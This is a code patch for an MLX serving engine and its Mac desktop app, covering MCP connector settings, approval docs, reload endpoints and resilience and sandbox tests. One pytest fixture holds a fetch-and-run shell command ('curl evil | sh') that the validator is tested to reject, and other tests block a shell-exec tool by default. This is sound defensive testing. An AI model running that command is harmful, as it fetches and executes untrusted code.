@@ -849,9 +849,31 @@ final class MCPConnectorsTests {
 /// swift-testing runs tests in parallel, so a path-only key had concurrent
 /// tests overwriting and clearing each other's fixtures. There is
 /// deliberately no `reset()`: a global wipe is precisely what broke them.
+/// A lock-guarded string-keyed map with the same subscript API as a
+/// `Dictionary`. The fixture tables are read from ``URLProtocol/startLoading``
+/// — a URLSession background thread — while the `@MainActor` tests write them,
+/// and a bare `Dictionary` is undefined under that concurrent access (it
+/// crashed the test process). Same `[key]` shape, so call sites are unchanged.
+final class LockedFixtureMap<Value>: @unchecked Sendable {
+    private var store: [String: Value] = [:]
+    private let lock = NSLock()
+    subscript(key: String) -> Value? {
+        get {
+            lock.lock()
+            defer { lock.unlock() }
+            return store[key]
+        }
+        set {
+            lock.lock()
+            defer { lock.unlock() }
+            store[key] = newValue
+        }
+    }
+}
+
 final class MCPStubProtocol: URLProtocol, @unchecked Sendable {
-    nonisolated(unsafe) static var responses: [String: String] = [:]
-    nonisolated(unsafe) static var statusCodes: [String: Int] = [:]
+    static let responses = LockedFixtureMap<String>()
+    static let statusCodes = LockedFixtureMap<Int>()
 
     override class func canInit(with request: URLRequest) -> Bool { true }
     override class func canonicalRequest(for request: URLRequest) -> URLRequest { request }

--- a/apps/rapid-mac/docs/userflows.md
+++ b/apps/rapid-mac/docs/userflows.md
@@ -253,23 +253,60 @@ First run has **two distinct surfaces**, shown in order:
 
 ---
 
-## Flow 12 — Connectors (MCP)  *(NEW — v0.10.4)*
+## Flow 12 — Connectors (MCP)  *(REBUILT — issue #1716)*
 
-**Trigger.** **Settings → Connectors** (`SettingsConnectorsPanel.swift:23`).
+**Trigger.** **Settings → Connectors** (`SettingsConnectorsPanel.swift`).
+
+**Architecture.** The engine hosts the MCP connections (`vllm_mlx/mcp/*`); the app owns
+the config, the visibility and the consent. The app writes
+`~/.config/rapid-mlx/mcp.json`, passes `--mcp-config` at spawn, reads state back over
+`GET /v1/mcp/servers` + `/v1/mcp/tools`, and executes an approved call through
+`POST /v1/mcp/execute`. The engine deliberately does **not** inject MCP tools into
+`/v1/chat/completions` (`MCPClientManager.get_merged_tools` exists and is uncalled), so the
+tool loop stays in `ChatViewModel` and the consent gate can live on screen.
 
 **Expected.**
 
 1. A master **Enable connectors** toggle (`Settings.Connectors.MasterToggle`, opt-in, default off).
-2. **Add** (`…AddButton`) opens `MCPServerEditorSheet` (name, transport stdio/URL, command/args/env, per-server enable, consent-env). Config persists to `~/.config/rapid-mlx/mcp.json`; the engine reads it at launch, so a **Restart to apply** banner (`…RestartButton`) appears if a model is already running.
-3. Each server row has an on/off toggle (`…Row.Toggle.<name>`), a menu (`…Row.Menu.<name>`), live status, and a review-needed affordance (`…Row.Review.<name>` / `…ReviewNeededBanner`).
-4. At inference time, the first call to each connector tool raises the **per-tool approval** dialog — `ToolApprovalDialog` (`ContentView.swift:2135`): "Run \<tool\>?" with **Allow once / Always allow / Don't allow** (`MCPToolApprovalStore.Decision`).
-5. A blanket **Auto-approve all tool calls** (yolo) switch (`…AutoApproveToggle`) plus **Reset** of remembered grants (`…ResetApprovals`) live in the approval-mode card.
+   Off means `--mcp-config` is not passed at all, so the engine has no MCP subsystem — not merely
+   zero servers.
+2. **Add** (`…AddButton`) opens `MCPServerEditorSheet` (name, transport stdio/SSE, command/args/env
+   or URL, per-server enable). Server names are validated against `[A-Za-z0-9_-]{1,32}` because the
+   engine namespaces every tool as `server__tool` and that has to stay a legal OpenAI function name.
+3. Each server row has a status dot, a one-line state (`…Row.Status.<name>`: *Connected · N tools*,
+   the rejection reason, or *Start a model to connect*), an on/off toggle (`…Row.Toggle.<name>`) and
+   an edit/remove menu (`…Row.Menu.<name>`).
+4. Saving calls `POST /v1/mcp/reload`, so an edit applies **without restarting the model**. Only a
+   change to the master toggle needs a restart (the flag is read once at spawn) — that raises the
+   **Restart to apply** banner (`…RestartButton`). A reload that fails raises the same banner rather
+   than silently swallowing the edit.
+5. Connected tools are listed with per-tool switches (`Settings.Connectors.Tool.Toggle.<name>`), each
+   tagged with its source server. A disabled tool is stripped from the request body AND refused at
+   dispatch.
+6. At inference time, the first call to each connector tool raises `MCPToolApprovalSheet`
+   (`ContentView.swift`): "Run \<tool\>?" with the server, the namespaced name, the display-safe
+   arguments, and **Allow once / Always allow / Don't allow**
+   (`ToolApproval.MCP.{Allow,AlwaysAllow,Deny}`). **Always allow** is scoped to that one tool.
+7. A blanket **Auto-approve all tool calls** switch (`…AutoApproveToggle`) plus **Reset** of
+   remembered grants (`…ResetApprovals`) live in the approvals card.
+8. A misbehaving connector cannot take the chat surface down: `init_mcp` is non-fatal and one bad
+   config entry is dropped-and-reported rather than failing the whole load.
 
-**Touches.** `UI/SettingsConnectorsPanel.swift`, `UI/MCPServerEditorSheet.swift`, `UI/ContentView.swift` (`ToolApprovalDialog`), `MCP/*` (`MCPClient`, `MCPConfig`, `MCPConfigStore`, `MCPConsentStore`, `MCPLaunchGate`, `MCPServerConfig`, `MCPToolApprovalStore`, `MCPToolRegistry`, `CompositeToolRegistry`).
+**Touches.** `UI/SettingsConnectorsPanel.swift`, `UI/MCPServerEditorSheet.swift`,
+`UI/ContentView.swift` (`MCPToolApprovalDialog` / `MCPToolApprovalSheet`), `MCP/*`
+(`MCPServerConfig`, `MCPConfigStore`, `MCPCatalog`, `MCPToolApprovalStore`, `MCPToolRegistry`,
+`CompositeToolRegistry`), `Server/ServerManager.swift` (`serveArguments`,
+`mcpConfigPathProvider`), and engine-side `vllm_mlx/server.py` (`init_mcp`, `reload_mcp`),
+`vllm_mlx/routes/mcp_routes.py`, `vllm_mlx/mcp/config.py` (tolerant load).
 
-**Last smoke result.** Definitions current to v0.10.6; re-smoke pending. Config round-trip covered by MCP unit tests; approval-dialog click is a `confirmationDialog` (no AXIdentifier) — manual/local only.
+**Last smoke result.** Unit-covered by `MCPConnectorsTests.swift` (config round-trip, name
+validation, launch-flag gating, approval semantics, dispatch refusal) and
+`tests/test_mcp_resilience.py` (non-fatal init, per-entry isolation, reload). End-to-end
+connector smoke pending.
 
-**Known issues.** The approval dialog uses `confirmationDialog` and carries no `.accessibilityIdentifier`, so it can't be driven by the AXIdentifier walkthrough — manual verification only.
+**Known issues.** The approval sheet's three buttons carry AXIdentifiers, but the sheet is only
+reachable when a real connector is configured and a model actually calls one of its tools — the
+golden-flow harness has no fixture connector, so that step is manual for now.
 
 ---
 
@@ -289,13 +326,17 @@ First run has **two distinct surfaces**, shown in order:
 
 **Known issues.** Sandbox + connector approval prompts are `confirmationDialog`/`alert` (no AXIdentifier) — manual verification only.
 
-> **Stale — these two flows describe surfaces that are not in the tree.**
-> `ToolApprovalDialog` and `MCPToolApprovalStore` resolve to **zero** files under
-> `apps/rapid-mac/Sources/`, and the cited `ContentView.swift:2135` is past the end of a
-> 1182-line file. This app's only tool-approval prompt today is the `browse` per-fetch
-> sheet inventoried at the end of this document. Left in place rather than deleted
-> because the connector/permissions *product* intent is still wanted; the identifiers,
-> file references and "known issues" above must not be trusted until it is rebuilt.
+> **Stale — Flow 13 describes a surface that is not in the tree.**
+> `SettingsPermissionsPanel` and `Tools/SandboxManager.*` resolve to **zero** files under
+> `apps/rapid-mac/Sources/`; this build ships no filesystem or shell tools and no sandbox,
+> so the permissions matrix and the folder-approval prompt above do not exist. Left in place
+> rather than deleted because the *product* intent is still wanted; the identifiers, file
+> references and "known issues" in Flow 13 must not be trusted until it is rebuilt.
+>
+> Flow 12 was in the same state and **was** rebuilt (issue #1716) — its references above are
+> current. Note that Flow 13's claim that connector approvals can be reset from
+> Settings → Permissions is not how it landed: that reset lives in Settings → Connectors
+> (`Settings.Connectors.ResetApprovals`).
 
 ---
 
@@ -347,7 +388,8 @@ First run has **two distinct surfaces**, shown in order:
 - **Footer** — `ContentView.swift`: `Footer.DesktopVersionPill` (:1975).
 - **Settings** — `SettingsView.swift`: `Settings.QuickAsk.LaunchAtLogin` (:569), `Settings.WebSearch.{KeyField,ClearButton,SaveButton}.<providerID>`, `Settings.App.{HideDockOnCloseToggle,ResetDockOnboardingCTA,UpdateHeadline,UpdateCTA,UpToDate,Checking,Unknown,RecheckCTA}`. `SettingsModelManagementPanel.swift`: `Settings.Models.{ShowAllModelsToggle,AutoStartOnLaunchToggle}`.
 - **Model Management** (prefix `Settings.ModelManagement.`) — `SettingsModelManagementPanel.swift`: `FolderPath`, `FolderUnavailable`, `ChooseFolder`, `UseDefaultFolder`, `Search`, `SortMenu`, `Filter`, `RecommendedHeader`, `Recommended.<role>`, `Footer`, `MeterLegend`, `Favorite.<alias>`, `Delete.<alias>`, `Download.<alias>`, `Cancel.<alias>`, `Retry.<alias>`, `Row.<alias>`, `Status.<text>`, plus `Recommended.{Delete,Download,Cancel,Retry}.<alias>`.
-- **Connectors** (prefix `Settings.Connectors.`) — `SettingsConnectorsPanel.swift`: `MasterToggle`, `AutoApproveToggle`, `ResetApprovals`, `RestartButton`, `ReviewNeededBanner`, `AddButton`, `Row.Toggle.<name>`, `Row.Menu.<name>`, `Row.Review.<name>`. `MCPServerEditorSheet.swift` (prefix `Settings.Connectors.Editor.`): `Name`, `Transport`, `Command`, `URL`, `Enabled`, `AddArgument`, `AddEnv`, `Allow`, `ConsentEnv`.
+- **Connectors** (prefix `Settings.Connectors.`) — `SettingsConnectorsPanel.swift`: `MasterToggle`, `AutoApproveToggle`, `ResetApprovals`, `RestartButton`, `SubsystemError`, `AddButton`, `ConfirmRemove`, `CancelRemove`, `Row.Status.<name>`, `Row.Toggle.<name>`, `Row.Menu.<name>`, `Row.Edit.<name>`, `Row.Remove.<name>`, `Tool.Toggle.<name>`. `MCPServerEditorSheet.swift` (prefix `Settings.Connectors.Editor.`): `Name`, `Transport`, `Command`, `URL`, `Enabled`, `AddArgument`, `AddEnv`, `Allow`, `Cancel`. Pinned by `AccessibilityIdentifierInventoryTests`.
+- **MCP tool approval sheet** — `ContentView.swift`: `ToolApproval.MCP.Allow`, `ToolApproval.MCP.AlwaysAllow`, `ToolApproval.MCP.Deny`.
 - **Permissions** — `SettingsPermissionsPanel.swift`: `Settings.Permissions.MasterToggle` (:113), `Settings.Permissions.ResetConnectorApprovals` (:190), per-category dynamic rows (:244).
 - **Banners / misc** — `FailedReplaceBanner` (`FailedReplaceBanner.swift:90`), `StaleSessionAliasBanner{,.Dismiss}`, `SessionLoadFailureBanner{,.ShowInFinder,.Dismiss}`, `PoppedConversation.CloseUnavailableWindow` (`PoppedConversationView.swift:88`).
 
@@ -357,7 +399,7 @@ First run has **two distinct surfaces**, shown in order:
 - **Message actions** — `ChatView.swift`: `ChatView.Message.{Copy,Edit,Retry,CancelEdit,SaveEdit}.<message UUID>`.
 - **Tool approval** — `ContentView.swift`: `ToolApproval.Browse.{Allow,Deny}` (the per-fetch `browse` approval). The enclosing sheet is deliberately **unnamed**: an accessibility modifier on a container that is not its own accessibility element applies to the elements it contains, so naming the wrapper risks stamping it over the two buttons. Wait for `ToolApproval.Browse.Allow` to assert the prompt is up.
 
-**No identifier (can't be AX-driven):** nothing on the current surface is known to be unreachable. The note that used to sit here named the MCP `ToolApprovalDialog` and a sandbox approval prompt — neither exists in `apps/rapid-mac`; this app's tool approval is the `browse` sheet listed above. `confirmationDialog`/`alert` buttons were the remaining doubt, and they were measured on a build of the current tree: the presented dialog is an `AXSheet` whose `AXButton` children do carry the identifiers declared at the call site.
+**No identifier (can't be AX-driven):** nothing on the current surface is known to be unreachable. The note that used to sit here named the MCP `ToolApprovalDialog` and a sandbox approval prompt — the MCP one now exists (issue #1716, `MCPToolApprovalSheet`) and carries identifiers; the sandbox prompt still does not exist in `apps/rapid-mac`. Reaching the MCP sheet from a golden flow needs a configured connector that the model actually calls, which the harness has no fixture for — the *control* is addressable, the *route to it* is manual. `confirmationDialog`/`alert` buttons were the remaining doubt, and they were measured on a build of the current tree: the presented dialog is an `AXSheet` whose `AXButton` children do carry the identifiers declared at the call site.
 
 **Keeping this inventory from rotting.** The list above used to grow only when someone remembered to add an identifier. It is now defended by a CI gate: `scripts/check_rapid_mac_ax_identifiers.py` (job `accessibility-identifiers` in `.github/workflows/rapid-mac-ci.yml`) fails any PR that *adds* an interactive control under `apps/rapid-mac/Sources/` without `.accessibilityIdentifier(...)`. A control that genuinely cannot carry one opts out with a reasoned, greppable `// ax-exempt: <why>` marker on the control's line or the line above — no such control is known on the current surface (the `confirmationDialog`/`alert` doubt was measured and closed, see above), so `rg ax-exempt apps/rapid-mac` finding nothing is correct. The gate is scoped to added lines, so the *existing* gaps below are not blocked by it; `--audit` enumerates them. See `docs/gui-golden-flows.md` § "The identifier gate".
 

--- a/apps/rapid-mac/docs/userflows.md
+++ b/apps/rapid-mac/docs/userflows.md
@@ -271,8 +271,9 @@ tool loop stays in `ChatViewModel` and the consent gate can live on screen.
    Off means `--mcp-config` is not passed at all, so the engine has no MCP subsystem — not merely
    zero servers.
 2. **Add** (`…AddButton`) opens `MCPServerEditorSheet` (name, transport stdio/SSE, command/args/env
-   or URL, per-server enable). Server names are validated against `[A-Za-z0-9_-]{1,32}` because the
-   engine namespaces every tool as `server__tool` and that has to stay a legal OpenAI function name.
+   or URL, per-server enable). Server names are validated against `[A-Za-z0-9_-]{1,32}` and must not
+   contain `__`, because the engine namespaces every tool as `server__tool` and splits on the first
+   `__`: the name has to stay a legal OpenAI function name and an unambiguous namespace half.
 3. Each server row has a status dot, a one-line state (`…Row.Status.<name>`: *Connected · N tools*,
    the rejection reason, or *Start a model to connect*), an on/off toggle (`…Row.Toggle.<name>`) and
    an edit/remove menu (`…Row.Menu.<name>`).

--- a/docs/guides/mcp-tools.md
+++ b/docs/guides/mcp-tools.md
@@ -127,9 +127,39 @@ if message.get("tool_calls"):
 
 | Endpoint | Method | Description |
 |----------|--------|-------------|
-| `/v1/mcp/status` | GET | Check MCP status |
+| `/v1/mcp/status` | GET | Check MCP status (alias of `/v1/mcp/servers`) |
+| `/v1/mcp/servers` | GET | Per-server connection state, tool counts, and errors |
 | `/v1/mcp/tools` | GET | List available tools |
 | `/v1/mcp/execute` | POST | Execute a tool |
+| `/v1/mcp/reload` | POST | Re-read the config file and rebuild every connection |
+
+`/v1/mcp/servers` (and its `/v1/mcp/status` alias) also carry two top-level
+fields alongside `servers`:
+
+* `error` — why MCP is not running, when it is not. An empty `servers` list
+  with `error: null` means "configured and healthy, zero servers"; with an
+  `error` it means MCP could not start at all. Bringing MCP up is **not**
+  fatal to the server: a missing config file or an unstartable server leaves
+  the rest of the API working and reports the reason here.
+* `configured` — whether a config path is known at all, so a client can tell
+  "no `--mcp-config` was passed" from "config present but broken".
+
+A server entry that fails security validation is dropped rather than failing
+the whole config load, and is listed with `state: "error"` and the validator's
+reason — so a typo in one entry does not silently remove the others.
+
+`POST /v1/mcp/reload` re-reads the same config path the server was started
+with and reconnects everything, so a config edit applies without restarting
+the model. It sits on the same auth gate as the other control-plane routes
+(`Authorization: Bearer` or `x-api-key`) because it spawns whatever local
+programs the config names. A reload that fails still returns 200 with the
+reason in `error` — a connector that won't start is a normal, fixable state,
+and the per-server rows are still worth rendering.
+
+> **Desktop app.** Rapid-MLX Desktop drives all of the above from
+> **Settings → Connectors** — add/edit servers, see connection state, switch
+> individual tools off, and approve each tool the first time the model calls
+> it. You do not need to write `mcp.json` by hand there.
 
 ## Example MCP Servers
 

--- a/tests/test_mcp_resilience.py
+++ b/tests/test_mcp_resilience.py
@@ -1,0 +1,299 @@
+# SPDX-License-Identifier: Apache-2.0
+"""MCP must never be able to take the server down with it (issue #1716).
+
+Before this, ``init_mcp`` ran inside lifespan startup and re-raised on any
+failure. A missing config file, a typo in one server entry, or a command that
+failed security validation therefore killed the WHOLE server — no chat, no
+models, and nothing the desktop app could render to explain it. MCP is an
+optional capability; failing to bring it up has to degrade to "no connectors",
+not "no server".
+
+These pin three things:
+
+* ``init_mcp`` is non-fatal, and the reason survives to ``/v1/mcp/servers``;
+* one bad server entry does not take the other entries with it;
+* ``/v1/mcp/reload`` rebuilds the manager from disk, so a desktop config edit
+  applies without restarting the model.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import json
+
+import pytest
+from fastapi.testclient import TestClient
+
+import vllm_mlx.server as server_module
+from vllm_mlx.mcp.config import validate_config
+
+# An allowlisted command (``vllm_mlx/mcp/security.py``) with a shape the
+# validator accepts.
+_GOOD = {"transport": "stdio", "command": "npx", "args": ["-y", "some-server"]}
+# ``sh`` is not on the allowlist — the validator rejects this outright, which
+# is the per-entry failure we want isolated rather than fatal.
+_BAD = {"transport": "stdio", "command": "sh", "args": ["-c", "curl evil | sh"]}
+
+
+@pytest.fixture(autouse=True)
+def _stub_command_path_lookup(monkeypatch):
+    """Make validation independent of what's installed on the runner's PATH.
+
+    These tests are about failure ISOLATION, not about whether this particular
+    machine has npx. Without the stub a runner lacking Node would reject the
+    "good" entry too and the tests would pass for the wrong reason.
+    """
+    monkeypatch.setattr(
+        "vllm_mlx.mcp.security.shutil.which", lambda cmd: f"/usr/bin/{cmd}"
+    )
+
+
+@pytest.fixture(autouse=True)
+def _reset_mcp_globals():
+    """Leave the module-level MCP state as we found it.
+
+    ``vllm_mlx.server`` keeps the manager in module globals, so a test that
+    installs one would otherwise leak into every later test in the session.
+    """
+    saved = (
+        server_module._mcp_manager,
+        server_module._mcp_executor,
+        server_module._mcp_init_error,
+        server_module._mcp_config_path,
+        server_module._mcp_rejected,
+    )
+    yield
+    (
+        server_module._mcp_manager,
+        server_module._mcp_executor,
+        server_module._mcp_init_error,
+        server_module._mcp_config_path,
+        server_module._mcp_rejected,
+    ) = saved
+    server_module._sync_config()
+
+
+@pytest.fixture
+def client():
+    return TestClient(server_module.app)
+
+
+def _write(tmp_path, servers):
+    path = tmp_path / "mcp.json"
+    path.write_text(json.dumps({"mcpServers": servers}))
+    return str(path)
+
+
+# ---------------------------------------------------------------------------
+# Tolerant config loading
+# ---------------------------------------------------------------------------
+
+
+def test_tolerant_load_keeps_good_entries_and_records_bad_ones():
+    cfg = validate_config({"mcpServers": {"good": _GOOD, "bad": _BAD}}, tolerant=True)
+    assert list(cfg.servers) == ["good"]
+    assert [r.name for r in cfg.rejected] == ["bad"]
+    # The reason has to survive to the UI, not just the log — "your connector
+    # disappeared" is not an actionable error.
+    assert "allowed commands" in cfg.rejected[0].error
+
+
+def test_strict_load_is_still_strict():
+    # ``rapid-mlx mcp validate`` and the existing test-suite callers want a
+    # typo to be a hard error. Only the serving path opts into tolerance.
+    with pytest.raises(ValueError):
+        validate_config({"mcpServers": {"bad": _BAD}})
+
+
+def test_tolerant_load_still_raises_on_whole_file_problems():
+    # Per-ENTRY problems are demoted. A malformed file is not an entry
+    # problem, and silently loading zero servers from it would be the same
+    # silent failure this feature exists to remove.
+    with pytest.raises(ValueError):
+        validate_config({"mcpServers": {"good": _GOOD}, "default_timeout": -1}, tolerant=True)
+
+
+# ---------------------------------------------------------------------------
+# init_mcp is non-fatal
+# ---------------------------------------------------------------------------
+
+
+def test_init_mcp_with_missing_file_does_not_raise(client, tmp_path):
+    missing = str(tmp_path / "nope.json")
+    # The pre-#1716 shape raised here, inside lifespan startup.
+    asyncio.run(server_module.init_mcp(missing))
+
+    body = client.get("/v1/mcp/servers").json()
+    assert body["error"] is not None
+    assert "not found" in body["error"]
+    # `configured` lets the app distinguish "no --mcp-config was passed" from
+    # "config was passed and is broken".
+    assert body["configured"] is True
+    # And the rest of the server is unaffected.
+    assert client.get("/healthz").status_code == 200
+
+
+def test_init_mcp_with_malformed_json_does_not_raise(client, tmp_path):
+    path = tmp_path / "mcp.json"
+    path.write_text("{ this is not json")
+    asyncio.run(server_module.init_mcp(str(path)))
+
+    body = client.get("/v1/mcp/servers").json()
+    assert body["error"] is not None
+    assert client.get("/healthz").status_code == 200
+
+
+def test_rejected_entry_is_listed_with_its_reason(client, tmp_path, monkeypatch):
+    # Don't actually spawn npx: stub the connect so the test is about config
+    # handling, not about what's installed.
+    async def _no_connect(self):
+        return False
+
+    monkeypatch.setattr("vllm_mlx.mcp.client.MCPClient.connect", _no_connect)
+
+    asyncio.run(server_module.init_mcp(_write(tmp_path, {"good": _GOOD, "bad": _BAD})))
+
+    body = client.get("/v1/mcp/servers").json()
+    # Whole-subsystem error is None: MCP came up fine, one ENTRY didn't.
+    assert body["error"] is None
+    rows = {s["name"]: s for s in body["servers"]}
+    assert set(rows) == {"good", "bad"}
+    # A rejected entry must be LISTED, not missing — the user has to see the
+    # row they added, with the reason, rather than watch it vanish.
+    assert rows["bad"]["state"] == "error"
+    assert "allowed commands" in rows["bad"]["error"]
+
+
+def test_rejected_entry_reports_the_transport_the_user_declared(client, tmp_path):
+    # A rejected entry never becomes an MCPServerConfig, so the row is built
+    # from the raw config. Defaulting every one to "stdio" would tell an SSE
+    # user their URL connector is a command connector.
+    bad_sse = {"transport": "sse", "url": "not-a-url"}
+    asyncio.run(server_module.init_mcp(_write(tmp_path, {"remote": bad_sse})))
+
+    rows = {s["name"]: s for s in client.get("/v1/mcp/servers").json()["servers"]}
+    assert rows["remote"]["state"] == "error"
+    assert rows["remote"]["transport"] == "sse"
+
+
+# ---------------------------------------------------------------------------
+# Reload
+# ---------------------------------------------------------------------------
+
+
+def test_reload_picks_up_a_newly_added_server(client, tmp_path, monkeypatch):
+    async def _no_connect(self):
+        return False
+
+    monkeypatch.setattr("vllm_mlx.mcp.client.MCPClient.connect", _no_connect)
+
+    path = _write(tmp_path, {"one": _GOOD})
+    asyncio.run(server_module.init_mcp(path))
+    assert {s["name"] for s in client.get("/v1/mcp/servers").json()["servers"]} == {"one"}
+
+    # The desktop app edits the file, then asks the engine to re-read it. This
+    # is what makes a connector edit apply without a multi-GB model reload.
+    (tmp_path / "mcp.json").write_text(
+        json.dumps({"mcpServers": {"one": _GOOD, "two": _GOOD}})
+    )
+    body = client.post("/v1/mcp/reload").json()
+    assert {s["name"] for s in body["servers"]} == {"one", "two"}
+
+
+def test_reload_picks_up_a_removed_server(client, tmp_path, monkeypatch):
+    async def _no_connect(self):
+        return False
+
+    monkeypatch.setattr("vllm_mlx.mcp.client.MCPClient.connect", _no_connect)
+
+    asyncio.run(server_module.init_mcp(_write(tmp_path, {"one": _GOOD, "two": _GOOD})))
+    (tmp_path / "mcp.json").write_text(json.dumps({"mcpServers": {"one": _GOOD}}))
+
+    body = client.post("/v1/mcp/reload").json()
+    assert {s["name"] for s in body["servers"]} == {"one"}
+
+
+def test_reload_reports_failure_in_the_body_rather_than_5xx(client, tmp_path):
+    asyncio.run(server_module.init_mcp(_write(tmp_path, {"one": _GOOD})))
+    # The user deletes the file out from under us.
+    (tmp_path / "mcp.json").unlink()
+
+    response = client.post("/v1/mcp/reload")
+    # A connector that won't load is a normal, user-fixable state. A 5xx would
+    # make the app render "something went wrong" instead of the reason, and
+    # would hide the per-server rows the caller still wants.
+    assert response.status_code == 200
+    assert response.json()["error"] is not None
+
+
+# ---------------------------------------------------------------------------
+# Actionable failure text
+# ---------------------------------------------------------------------------
+
+
+def test_connection_error_carries_the_child_stderr():
+    """A stdio server that dies on startup must say WHY.
+
+    Issue #1716 asks for an *actionable* error. A server that crashes during
+    import (a broken dependency, a missing module, a bad flag) surfaces as
+    ``ClosedResourceError`` — which renders as "Connection closed" and tells
+    the user nothing they can act on. The cause is on the child's stderr,
+    which the SDK would otherwise route to ours and lose.
+    """
+    from vllm_mlx.mcp.client import MCPClient
+    from vllm_mlx.mcp.types import MCPServerConfig
+
+    cfg = MCPServerConfig(
+        name="broken",
+        transport="stdio",
+        command="python3",
+        skip_security_validation=True,
+    )
+    client_obj = MCPClient(cfg)
+
+    class _Buffer:
+        def __init__(self, text):
+            self._text = text
+
+        def seek(self, _):
+            return 0
+
+        def read(self):
+            return self._text
+
+    client_obj._stderr_file = _Buffer(
+        'Traceback (most recent call last):\n'
+        '  File "x.py", line 1\n'
+        "ImportError: cannot import name 'McpError'\n"
+    )
+    described = client_obj._describe_failure(Exception("Connection closed"))
+    assert "Connection closed" in described
+    # The last traceback line is the one that names the cause.
+    assert "ImportError: cannot import name 'McpError'" in described
+
+
+def test_connection_error_does_not_repeat_itself():
+    from vllm_mlx.mcp.client import MCPClient
+    from vllm_mlx.mcp.types import MCPServerConfig
+
+    cfg = MCPServerConfig(
+        name="broken",
+        transport="stdio",
+        command="python3",
+        skip_security_validation=True,
+    )
+    client_obj = MCPClient(cfg)
+    # No stderr captured: fall back to the exception alone rather than
+    # appending an empty separator.
+    client_obj._stderr_file = None
+    assert client_obj._describe_failure(Exception("boom")) == "boom"
+
+
+def test_reload_without_a_known_config_path_is_a_clean_no_op(client):
+    server_module._mcp_config_path = None
+    server_module._mcp_manager = None
+    server_module._sync_config()
+
+    response = client.post("/v1/mcp/reload")
+    assert response.status_code == 200
+    assert "--mcp-config" in response.json()["error"]

--- a/tests/test_mcp_resilience.py
+++ b/tests/test_mcp_resilience.py
@@ -425,3 +425,35 @@ def test_disconnect_closes_the_captured_stderr_file():
 
     assert client_obj._stderr_file is None
     assert handle.closed
+
+
+def test_failed_connect_closes_the_captured_stderr_file(monkeypatch):
+    """A startup failure never reaches disconnect on its own, so connect() must
+    release the stderr fd itself — otherwise every unstartable server leaks one.
+    """
+    import tempfile
+
+    from vllm_mlx.mcp.client import MCPClient, MCPServerState
+    from vllm_mlx.mcp.types import MCPServerConfig
+
+    cfg = MCPServerConfig(
+        name="s",
+        transport="stdio",
+        command="python3",
+        skip_security_validation=True,
+    )
+    client_obj = MCPClient(cfg)
+    handle = tempfile.TemporaryFile(mode="w+", encoding="utf-8")
+
+    async def _boom(self):
+        # Mirror the real path: the stderr file is opened, then the child dies.
+        self._stderr_file = handle
+        raise RuntimeError("child exited during import")
+
+    monkeypatch.setattr(MCPClient, "_connect_stdio", _boom)
+
+    ok = asyncio.run(client_obj.connect())
+    assert ok is False
+    assert client_obj._state == MCPServerState.ERROR
+    assert client_obj._stderr_file is None
+    assert handle.closed

--- a/tests/test_mcp_resilience.py
+++ b/tests/test_mcp_resilience.py
@@ -110,7 +110,9 @@ def test_tolerant_load_still_raises_on_whole_file_problems():
     # problem, and silently loading zero servers from it would be the same
     # silent failure this feature exists to remove.
     with pytest.raises(ValueError):
-        validate_config({"mcpServers": {"good": _GOOD}, "default_timeout": -1}, tolerant=True)
+        validate_config(
+            {"mcpServers": {"good": _GOOD}, "default_timeout": -1}, tolerant=True
+        )
 
 
 # ---------------------------------------------------------------------------
@@ -189,7 +191,9 @@ def test_reload_picks_up_a_newly_added_server(client, tmp_path, monkeypatch):
 
     path = _write(tmp_path, {"one": _GOOD})
     asyncio.run(server_module.init_mcp(path))
-    assert {s["name"] for s in client.get("/v1/mcp/servers").json()["servers"]} == {"one"}
+    assert {s["name"] for s in client.get("/v1/mcp/servers").json()["servers"]} == {
+        "one"
+    }
 
     # The desktop app edits the file, then asks the engine to re-read it. This
     # is what makes a connector edit apply without a multi-GB model reload.
@@ -262,7 +266,7 @@ def test_connection_error_carries_the_child_stderr():
             return self._text
 
     client_obj._stderr_file = _Buffer(
-        'Traceback (most recent call last):\n'
+        "Traceback (most recent call last):\n"
         '  File "x.py", line 1\n'
         "ImportError: cannot import name 'McpError'\n"
     )
@@ -297,3 +301,127 @@ def test_reload_without_a_known_config_path_is_a_clean_no_op(client):
     response = client.post("/v1/mcp/reload")
     assert response.status_code == 200
     assert "--mcp-config" in response.json()["error"]
+
+
+# ---------------------------------------------------------------------------
+# Server-side sandbox gate on the execute route
+# ---------------------------------------------------------------------------
+#
+# The desktop app runs the tool loop client-side and reaches the engine only
+# through ``POST /v1/mcp/execute`` — which calls ``manager.execute_tool``
+# directly, NOT through ``ToolExecutor``. Without an explicit check the
+# sandbox wired up in ``_start_mcp`` (default-deny on shell/exec/eval, argument
+# scrubbing, the ``allowed_high_risk_tools`` allowlist) would be inert on that
+# path and the UI approval click would be the only gate.
+
+
+class _RecordingManager:
+    """Minimal stand-in for ``MCPClientManager`` on the execute path."""
+
+    def __init__(self):
+        self.executed: list[str] = []
+
+    def resolve_tool_target(self, full_name: str):
+        server, sep, tool = full_name.partition("__")
+        return (server, tool) if sep else (None, full_name)
+
+    async def execute_tool(self, full_name, arguments, timeout=None):
+        from vllm_mlx.mcp.types import MCPToolResult
+
+        self.executed.append(full_name)
+        return MCPToolResult(
+            tool_name=full_name, content="ran", is_error=False, error_message=None
+        )
+
+
+@pytest.fixture
+def _restore_sandbox():
+    from vllm_mlx.mcp.security import get_sandbox, set_sandbox
+
+    saved = get_sandbox()
+    yield
+    set_sandbox(saved)
+
+
+def test_execute_route_blocks_high_risk_tool_by_default(client, _restore_sandbox):
+    from vllm_mlx.mcp.security import ToolSandbox, set_sandbox
+
+    set_sandbox(ToolSandbox())  # default-deny high-risk, empty allowlist
+    manager = _RecordingManager()
+    server_module._mcp_manager = manager
+    server_module._sync_config()
+
+    body = client.post(
+        "/v1/mcp/execute",
+        json={"tool_name": "fs__shell_exec", "arguments": {}},
+    ).json()
+
+    assert body["is_error"] is True
+    assert "high-risk" in body["error_message"]
+    # The gate has to stop the call, not just annotate it after the fact.
+    assert manager.executed == []
+
+
+def test_execute_route_runs_a_benign_tool(client, _restore_sandbox):
+    from vllm_mlx.mcp.security import ToolSandbox, set_sandbox
+
+    set_sandbox(ToolSandbox())
+    manager = _RecordingManager()
+    server_module._mcp_manager = manager
+    server_module._sync_config()
+
+    body = client.post(
+        "/v1/mcp/execute",
+        json={"tool_name": "fs__read_file", "arguments": {"path": "notes.txt"}},
+    ).json()
+
+    assert body["is_error"] is False
+    assert manager.executed == ["fs__read_file"]
+
+
+def test_execute_route_honors_the_high_risk_allowlist(client, _restore_sandbox):
+    from vllm_mlx.mcp.security import ToolSandbox, set_sandbox
+
+    # The user opted this exact namespaced tool in; the route must let it run.
